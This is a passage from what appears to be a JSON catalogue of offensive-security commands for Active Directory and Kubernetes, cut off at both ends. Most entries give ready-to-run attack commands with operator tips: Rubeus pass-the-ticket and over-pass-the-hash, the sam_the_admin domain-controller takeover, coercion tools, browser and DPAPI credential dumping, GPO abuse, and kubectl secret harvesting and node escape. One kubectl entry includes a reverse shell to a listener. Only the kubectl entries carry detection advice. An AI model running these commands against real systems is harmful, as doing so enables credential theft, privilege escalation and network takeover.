/nowrap","description":"Rubeus monitor continuously watches for new Kerberos TGTs as users authenticate to the host, printing any captured tickets on a fixed interval. It is most useful on servers where privileged accounts or delegation targets log on, letting an operator harvest fresh TGTs for pass-the-ticket. Requires an elevated context to see tickets for other logon sessions.\n\nCommand Reference:\n\n\tUsername: john","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://attack.mitre.org/techniques/T1558/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-OverPassTheHash","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-OverPassTheHash","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement","Credential Access"],"nativeCategory":["Lateral Movement","Credential Access"],"command":"# Over-pass-the-hash: turn an AES256 key into a live TGT and inject it\nRubeus.exe asktgt /user:john /aes256:5db474e563f34e4bb62e04eecd4a6f92 /domain:test.local /dc:dc.test.local /ptt /nowrap","description":"Over-pass-the-hash (pass-the-key) uses a captured AES or NT key to request a legitimate TGT for that user directly from the KDC, converting a stolen key into full Kerberos access without ever knowing the plaintext password. Using the AES256 key with /aes256 avoids the RC4 (etype 23) downgrade that mature environments alert on, making it more OPSEC-safe than /rc4. The /ptt flag injects the resulting TGT for immediate lateral movement.\n\nCommand Reference:\n\n\tUsername: john\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["AES key","Username"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-Ptt","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Ptt","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement","Defense Evasion"],"nativeCategory":["Lateral Movement","Defense Evasion"],"command":"# Inject a .kirbi ticket into the current session\nRubeus.exe ptt /ticket:ticket.kirbi\n\n# Or target a specific logon session by LUID (requires elevation)\nRubeus.exe ptt /ticket:ticket.kirbi /luid:0x3e7","description":"Rubeus ptt performs a pass-the-ticket by submitting a base64 or .kirbi ticket into the current logon session (or a target LUID when elevated). Once injected the ticket is used transparently by Windows for Kerberos authentication to remote services such as SMB, LDAP or WinRM. Use it after obtaining a TGT/TGS via tgtdeleg, dump, monitor, kerberoast/s4u, or Impacket ticketConverter output.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":[],"requires":["Kerberos ticket"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-Renew","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Renew","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Credential Access"],"nativeCategory":["Persistence","Credential Access"],"command":"# Renew a TGT from a .kirbi file and inject it, auto-renewing to the renew-till limit\nRubeus.exe renew /ticket:ticket.kirbi /dc:dc.test.local /autorenew /ptt /nowrap","description":"Rubeus renew submits a renewal request for an existing TGT to the KDC, returning a fresh ticket with an extended validity window. It accepts either a base64 blob or a .kirbi file and can auto-renew repeatedly up to the ticket's renew-till limit, which helps maintain access without re-authenticating. Combine with /ptt to inject the renewed ticket into the current session.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["Kerberos ticket"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-TgtDeleg","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-TgtDeleg","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Extract a usable TGT (.kirbi + session key) for the current user, no elevation needed\nRubeus.exe tgtdeleg /nowrap","description":"Rubeus tgtdeleg abuses the Kerberos GSS-API delegation mechanism to obtain a usable TGT (including its session key) for the current user context without requiring local administrator rights. It requests a service ticket for a target SPN with the delegation flag set, then extracts the forwarded TGT that the KDC embeds, yielding a .kirbi that can be passed to another host. Use it for pass-the-ticket from an unprivileged foothold when you cannot dump LSASS.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:sam-the-admin","toolId":"wadcoms:sam","toolName":"sam","name":"sam_the_admin (sAMAccountName Spoofing)","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Credential Access"],"nativeCategory":["PrivEsc","Exploitation","Credential Access"],"command":"# SYSTEM shell on the DC\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -shell\n\n# Dump domain hashes\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -dump","description":"WazeHell's sam_the_admin.py is a self-contained implementation of the CVE-2021-42278 + CVE-2021-42287 chain. It creates a computer account, spoofs its sAMAccountName to impersonate the DC machine account, and automatically impersonates the Administrator to obtain a privileged ticket. Requires MachineAccountQuota > 0 and an unpatched DC. Pass -shell for a semi-interactive SYSTEM shell on the DC or -dump to run secretsdump; the account only needs valid domain credentials (no special privileges).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/WazeHell/sam-the-admin","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:ShadowCoerce","toolId":"wadcoms:ShadowCoerce","toolName":"ShadowCoerce","name":"ShadowCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 shadowcoerce.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1","description":"ShadowCoerce abuses the MS-FSRVP (File Server Remote VSS Protocol) RPC interface to coerce a target host into authenticating to an attacker-controlled listener. MS-FSRVP is exposed when the File Server VSS Agent Service feature is installed, so the vector is more situational than PrinterBug or PetitPotam, but it remained exploitable after some EFSRPC patches. The listener is supplied first and the target second, matching the PetitPotam-style argument order. Provide a valid domain account or NT hash.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/ShutdownRepo/ShadowCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpChrome-Logins","toolId":"wadcoms:SharpChrome","toolName":"SharpChrome","name":"SharpChrome-Logins","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"SharpChrome.exe logins /unprotect","description":"SharpChrome (part of the SharpDPAPI project) extracts Chromium-based browser secrets - saved logins, cookies, and credit cards - by resolving the browser's DPAPI-protected AES state key and decrypting the login database. The logins command with /unprotect uses the current user's DPAPI keys directly to reveal stored passwords in plaintext. Run it in the target user's session (or supply /pvk: with the domain backup key); it also supports /browser:edge and cookies output for session hijacking.\n\nCommand Reference:\n\n\tTarget browser: Chrome (current user profile)","mitre":["T1555.003"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/003/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpDPAPI-Masterkeys-Credentials","toolId":"wadcoms:SharpDPAPI","toolName":"SharpDPAPI","name":"SharpDPAPI-Masterkeys-Credentials","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Decrypt the user's DPAPI masterkeys\nSharpDPAPI.exe masterkeys /password:password123\n\n# Decrypt Credential Manager blobs with the recovered masterkeys\nSharpDPAPI.exe credentials /mkfile:masterkeys.txt","description":"SharpDPAPI is a C# port of Mimikatz's DPAPI functionality for triaging Windows Data Protection API secrets. The masterkeys command decrypts the current user's DPAPI master keys (with /password: for their plaintext, or /pvk: with the domain backup key), writing a {GUID}:SHA1 lookup file. The credentials command then uses that /mkfile: to decrypt the user's Credential Manager blobs to plaintext. Run it from the user's own context or an elevated shell; it avoids dropping Mimikatz on disk.\n\nCommand Reference:\n\n\tPassword: password123\n\n\tMasterkey file: masterkeys.txt","mitre":["T1555.004"],"requires":["Shell","Password"],"services":["NTLM"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpGPOAbuse-AddLocalAdmin","toolId":"wadcoms:SharpGPOAbuse","toolName":"SharpGPOAbuse","name":"SharpGPOAbuse-AddLocalAdmin","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Lateral Movement","Persistence"],"nativeCategory":["PrivEsc","Lateral Movement","Persistence"],"command":"SharpGPOAbuse.exe --AddLocalAdmin --UserAccount john --GPOName \"Vulnerable GPO\"","description":"SharpGPOAbuse abuses edit rights over a Group Policy Object to push malicious settings to every computer/user in the GPO's scope. --AddLocalAdmin injects a Restricted Groups / GptTmpl.inf entry that adds the specified account to the local Administrators group on all machines the GPO applies to. You must already have write access to the target GPO (found via PowerView's Get-DomainGPO ACLs); changes take effect at the next Group Policy refresh, so consider forcing gpupdate on target hosts.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO","mitre":["T1484.001"],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpGPOAbuse-AddUserRights","toolId":"wadcoms:SharpGPOAbuse","toolName":"SharpGPOAbuse","name":"SharpGPOAbuse-AddUserRights","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"SharpGPOAbuse.exe --AddUserRights --UserRights \"SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight\" --UserAccount john --GPOName \"Vulnerable GPO\"","description":"SharpGPOAbuse --AddUserRights assigns Windows privileges / logon rights to an account through an editable GPO, writing them into the GPO's security template. Granting rights such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeRemoteInteractiveLogonRight to a controlled user provides a durable escalation and remote-logon foothold across every host in scope. The --UserRights list is comma-separated and case-sensitive and must use the exact NT privilege constant names.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO","mitre":["T1484.001"],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpView-Enumeration","toolId":"wadcoms:SharpView","toolName":"SharpView","name":"SharpView-Enumeration","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Kerberoastable accounts\nSharpView.exe Get-DomainUser -SPN\n# AS-REP roastable accounts\nSharpView.exe Get-DomainUser -PreauthNotRequired\n# Interesting ACLs with resolved GUIDs\nSharpView.exe Find-InterestingDomainAcl -ResolveGUIDs","description":"SharpView is a .NET/C# port of PowerView that exposes the same function names and parameters as a compiled executable, useful when PowerShell is locked down (Constrained Language Mode, AMSI/logging on script hosts) but arbitrary binaries still run. Each PowerView function becomes a positional first argument, and switches keep their PowerView names. It is handy for one-shot enumeration such as pulling kerberoastable accounts or interesting ACLs from a beacon.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/tevora-threat/SharpView","https://github.com/PowerShellMafia/PowerSploit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SpoolSample-PrinterBug","toolId":"wadcoms:SpoolSample","toolName":"SpoolSample","name":"SpoolSample-PrinterBug","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"SpoolSample.exe 10.10.10.1 10.10.10.2","description":"SpoolSample.exe is the original Windows C# implementation of the PrinterBug (MS-RPRN) coercion technique. Run from an existing foothold on a domain-joined Windows host, it calls the print spooler's change-notification RPC on the target to force that target's machine account to authenticate back to a capture server, which is typically an ntlmrelayx or Responder listener. It is the on-host counterpart to printerbug.py and useful when operating entirely from a compromised Windows box under an existing user context. Requires the Print Spooler service to be running on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tCapture Server IP: 10.10.10.2","mitre":[],"requires":["Shell"],"services":["RPC","NTLM"],"references":["https://github.com/leechristensen/SpoolSample","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SweetPotato-SeImpersonate","toolId":"wadcoms:SweetPotato","toolName":"SweetPotato","name":"SweetPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# -e selects the coercion primitive (EfsRpc | DCOM | WinRM | PrintSpoofer | PetitPotam)\nSweetPotato.exe -p C:\\Windows\\System32\\cmd.exe -a \"/c whoami\" -e EfsRpc","description":"SweetPotato bundles several SYSTEM-coercion primitives (EfsRpc, DCOM/RoguePotato-style OXID, PrintSpoofer, PetitPotam, WinRM) behind one binary, selected with -e, so you can fall back to whichever named-pipe or DCOM coercion the host permits. It captures the coerced SYSTEM token and launches the program in -p with the arguments in -a. Handy on IIS/MSSQL service accounts when you want to try multiple potato techniques without swapping tools. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tExploit mode: EfsRpc","mitre":[],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/CCob/SweetPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Whisker-ShadowCredentials","toolId":"wadcoms:Whisker","toolName":"Whisker","name":"Whisker-ShadowCredentials","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Add a shadow credential to the target and get the follow-up Rubeus command\nWhisker.exe add /target:victim /domain:test.local /dc:dc.test.local","description":"Whisker is a C# tool that manipulates the msDS-KeyCredentialLink attribute to perform the Shadow Credentials attack from a Windows host. `Whisker.exe add` generates a certificate, adds the corresponding key credential to the target object, and prints a ready-to-run Rubeus asktgt PKINIT command to authenticate as the victim and recover its NT hash. It requires GenericWrite/GenericAll over the target and a DC that supports PKINIT (an enterprise CA present). Stealthier than a password reset because the account's password is unchanged.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: dc.test.local\n\n\tTarget account: victim","mitre":[],"requires":["Shell"],"services":["LDAP","ADCS"],"references":["https://github.com/eladshamir/Whisker","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"daemon:kubectl:0","toolId":"daemon:kubectl","toolName":"kubectl","name":"Execute","source":"DAEMON","platform":["Linux","Windows"],"capability":["Execution","Reverse/Bind Shell"],"nativeCategory":["Execute","Container Administration"],"command":"kubectl exec -it pod-x -n ns-x -- /bin/sh\nkubectl exec pod-x -n ns-x -- bash -c \"bash -i >& /dev/tcp/10.10.10.10/4444 0>&1\"","description":"Runs an arbitrary command inside an already-running pod through the Kubernetes API's pods/exec subresource, giving an interactive shell without deploying anything new. With a token that has the exec verb, an operator can pivot into any reachable workload and, as shown, spawn a reverse shell back to a listener.","usecase":"Interactively run commands or pop a shell inside an existing pod using only exec RBAC, avoiding creation of new objects.","mitre":["T1609"],"privilege":"user","detection":[{"type":"Detection","value":"Kubernetes API audit log create events on the pods/exec subresource (objectRef.subresource=exec). Alert on exec into production/system namespaces, exec by service-account identities that normally never exec, and exec commands spawning shells (sh, bash, /dev/tcp). Correlate with kubelet logs."}],"references":["https://attack.mitre.org/techniques/T1609/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/"],"added":true,"verifyNote":"MITRE T1609 page explicitly names `kubectl exec` as a procedure; kubectl_exec generated docs confirm -it/-n/-- syntax. Binary absent from GTFOBins/LOLBAS/WADComs.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:kubectl:1","toolId":"daemon:kubectl","toolName":"kubectl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access"],"command":"kubectl get secrets --all-namespaces -o json\nkubectl get secret secret-x -n ns-x -o jsonpath='{.data.token}' | base64 -d","description":"Lists Kubernetes Secret objects and dumps their contents. Secret data is only base64-encoded in the API, so a single get/list on the secrets resource returns service-account tokens, registry pull creds, TLS keys and app passwords in recoverable form. --all-namespaces harvests every namespace the identity can read.","usecase":"Harvest tokens, cloud keys and passwords cluster-wide from the API when the compromised identity holds get/list on secrets.","mitre":["T1552.007"],"privilege":"user","detection":[{"type":"Detection","value":"Enable RequestResponse-level audit on the secrets resource. Alert on list/get across many namespaces or all-namespaces, especially from service accounts. Red Canary Atomic T1552.007 mirrors this. Watch /api/v1/secrets and /api/v1/namespaces/*/secrets GET/LIST spikes."}],"references":["https://attack.mitre.org/techniques/T1552/007/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md","https://kubernetes.io/docs/concepts/configuration/secret/"],"added":true,"verifyNote":"MITRE T1552.007 (Container API) description explicitly covers using the Kubernetes API to retrieve Secrets; Red Canary Atomic T1552.007 replicates `kubectl get secrets`. Secrets are base64, not encrypted (k8s Secret docs).","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:kubectl:2","toolId":"daemon:kubectl","toolName":"kubectl","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Deploy Container"],"command":"kubectl run pod-x -n ns-x --restart=Never -it --rm --image=alpine --overrides='{\"spec\":{\"hostPID\":true,\"containers\":[{\"name\":\"c\",\"image\":\"alpine\",\"stdin\":true,\"tty\":true,\"command\":[\"/bin/sh\"],\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"name\":\"host\",\"mountPath\":\"/host\"}]}],\"volumes\":[{\"name\":\"host\",\"hostPath\":{\"path\":\"/\"}}]}}'\n# then inside: chroot /host sh","description":"Uses the --overrides flag of kubectl run to inject a raw pod spec that is privileged, shares the host PID namespace and mounts the node root filesystem via a hostPath volume. Once scheduled, chroot /host yields a root shell on the underlying node, escaping the cluster's isolation boundary.","usecase":"Escape from cluster tenant to full node root when the identity can create pods with privileged/hostPath specs (no PodSecurity restricted).","mitre":["T1611","T1610"],"privilege":"user","detection":[{"type":"Detection","value":"Audit pods/create where securityContext.privileged=true, hostPID/hostNetwork/hostIPC=true, or volumes[].hostPath is set (especially path /). Enforce Pod Security Admission 'restricted' or an admission controller (OPA/Kyverno) to block these specs and alert on rejections."}],"references":["https://attack.mitre.org/techniques/T1611/","https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"],"added":true,"verifyNote":"`--overrides` is a documented kubectl run flag (inline JSON merged into the generated object); kubernetes/kubectl#721 and HackTricks document it as the privileged/hostPath escape workaround. T1611 (Escape to Host)+T1610 (Deploy Container) correct.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:kubectl:3","toolId":"daemon:kubectl","toolName":"kubectl","name":"Node Access","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","File Read"],"nativeCategory":["Node Access","Escape to Host"],"command":"kubectl debug node/node-x -it --image=alpine --profile=sysadmin\n# then inside the debug pod: chroot /host sh","description":"kubectl debug node creates a debugging pod that runs in the target node's host namespaces with the node root filesystem mounted at /host. Combined with --profile=sysadmin (privileged) and chroot /host it provides root-level access to the node's disk and processes, a supported feature repurposed for host takeover.","usecase":"Obtain node filesystem/root access through the sanctioned node-debug path when create-pods on nodes is permitted.","mitre":["T1611"],"privilege":"user","detection":[{"type":"Detection","value":"Audit for pod create with names matching node-debugger-* and node-scoped debug pods carrying host namespaces or --profile=sysadmin. Alert on debug pods mounting /host or running chroot. Restrict the node/debug capability via RBAC."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/kubectl-node-debug/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_debug/"],"added":true,"verifyNote":"kubernetes.io 'Debugging Kubernetes Nodes With Kubectl' page (fetched live) confirms node root mounts at /host, that plain debug is not privileged so chroot /host fails unless `--profile=sysadmin` is used; T1611. Both refs live.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:kubectl:4","toolId":"daemon:kubectl","toolName":"kubectl","name":"File Copy","source":"DAEMON","platform":["Linux","Windows"],"capability":["File Copy","Collection"],"nativeCategory":["File Copy","Collection"],"command":"kubectl cp ns-x/pod-x:/etc/passwd /tmp/x\nkubectl cp /tmp/x ns-x/pod-x:/tmp/x","description":"Copies files and directories out of or into a pod. Under the hood kubectl cp streams a tar archive through the pods/exec subresource (the container image must contain tar), so it doubles as a data-exfiltration and tool-staging channel that only needs exec permission.","usecase":"Pull sensitive files out of a pod or stage attacker tooling into it using nothing but exec/cp rights.","mitre":["T1609"],"privilege":"user","detection":[{"type":"Detection","value":"cp rides pods/exec, so audit exec create events invoking tar (command contains 'tar -cf -' or 'tar -xmf -'). Alert on exec+tar into/out of sensitive workloads and on large streamed transfers correlated with exec sessions."}],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_cp/","https://attack.mitre.org/techniques/T1609/"],"added":true,"verifyNote":"kubectl_cp generated docs confirm cp streams a tar via the exec subresource and requires tar in the container image; T1609 justified because cp executes tar in-container. Absent from GTFOBins/LOLBAS.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:kubectl:5","toolId":"daemon:kubectl","toolName":"kubectl","name":"Discovery","source":"DAEMON","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"kubectl auth can-i --list\nkubectl auth can-i create pods -n ns-x\nkubectl auth can-i --list --as=system:serviceaccount:ns-x:sa-x","description":"Queries the RBAC authorizer (SelfSubjectRulesReview / SelfSubjectAccessReview) to enumerate exactly which resources and verbs the current identity is allowed. --list dumps the full permission matrix; --as combines with impersonation rights to map another subject's power without using its credentials.","usecase":"Enumerate the compromised token's RBAC reach (and plan escalation) before taking any noisy action.","mitre":["T1069"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create events on selfsubjectrulesreviews / selfsubjectaccessreviews (a public Sigma rule flags RBAC permission listing). A burst of can-i / --list right after a new token appears is a strong recon signal; alert on impersonation (--as) combined with these reviews."}],"references":["https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access","https://detection.fyi/sigmahq/sigma/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing/"],"added":true,"verifyNote":"can-i --list uses SelfSubjectRulesReview (k8s authz docs, 'Checking API access'); detection.fyi Sigma rule 'RBAC Permission Enumeration Attempt' fetched live (it tags T1069.003/T1087.004 — parent T1069 retained as correct).","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:kubectl:6","toolId":"daemon:kubectl","toolName":"kubectl","name":"Lateral Movement","source":"DAEMON","platform":["Linux"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement","Proxy"],"command":"kubectl port-forward svc/svc-x -n ns-x 8080:80\nkubectl port-forward --address 0.0.0.0 pod-x -n ns-x 8080:8080","description":"Opens a tunnel from the operator's machine, through the API server and kubelet, to a port on a pod or service via the pods/portforward subresource. This reaches ClusterIP-only services (databases, internal admin UIs, dashboards) that are otherwise unroutable, and --address 0.0.0.0 can expose the tunnel to other hosts.","usecase":"Reach cluster-internal services (DBs, dashboards, metadata proxies) from outside without deploying a pod.","mitre":["T1090.001"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create on the pods/portforward subresource (objectRef.subresource=portforward). Alert on port-forward to sensitive services (etcd, databases, dashboards), long-lived forwards, and --address bindings other than localhost."}],"references":["https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#port-forward","https://attack.mitre.org/techniques/T1090/001/"],"added":true,"verifyNote":"Command real: `kubectl port-forward` with the pods/portforward subresource and the `--address` flag are documented in kubectl docs. FIX: MITRE changed T1609->T1090.001 (Internal Proxy) and reference swapped accordingly — T1609 is defined as executing commands within a container, which port-forward does not do; it establishes a proxy tunnel to internal services.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:kubectl:7","toolId":"daemon:kubectl","toolName":"kubectl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Token Request"],"command":"kubectl create token sa-x -n ns-x --duration=999999h","description":"Requests a bound service-account token through the TokenRequest API. An identity that can create serviceaccounts/token for a more-privileged service account can mint a fresh bearer token for it and assume its permissions, with --duration pushing the expiry far out.","usecase":"Mint a valid bearer token for a higher-privileged service account to escalate or persist.","mitre":["T1528"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create on the serviceaccounts/token subresource (TokenRequest). Alert when a subject requests tokens for service accounts it does not own, on unusually long --duration / requested expirationSeconds, and on token requests for privileged SAs (e.g. cluster-admin-bound)."}],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_create/kubectl_create_token/","https://attack.mitre.org/techniques/T1528/"],"added":true,"verifyNote":"kubectl_create_token generated docs confirm `create token` is backed by the TokenRequest API and that `--duration` sets the requested token lifetime; T1528 (Steal Application Access Token) fits assuming a higher-priv SA. Server may cap very long durations, but the flag is real.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:kubectl:8","toolId":"daemon:kubectl","toolName":"kubectl","name":"Discovery","source":"DAEMON","platform":["Linux","Windows"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"kubectl get pods -A -o wide\nkubectl get nodes -o wide\nkubectl get all -A -o yaml","description":"Enumerates cluster resources: pods and their node placement/IPs, nodes and addresses, and full object manifests. -o yaml exposes environment variables, mounted volumes, image references and annotations that frequently leak credentials and reveal the escape/lateral-movement surface.","usecase":"Map workloads, nodes and embedded config/secrets to plan lateral movement and host escape.","mitre":["T1613"],"privilege":"user","detection":[{"type":"Detection","value":"Audit high-volume list/get across pods, nodes and other resources (especially -A / cluster-scoped) from a single identity in a short window. Baseline normal read patterns per service account and alert on broad enumeration by identities that usually touch one namespace."}],"references":["https://attack.mitre.org/techniques/T1613/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_get/"],"added":true,"verifyNote":"kubectl_get generated docs confirm -A/--all-namespaces, -o wide and -o yaml; T1613 (Container and Resource Discovery) is the correct technique for cluster resource enumeration.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check 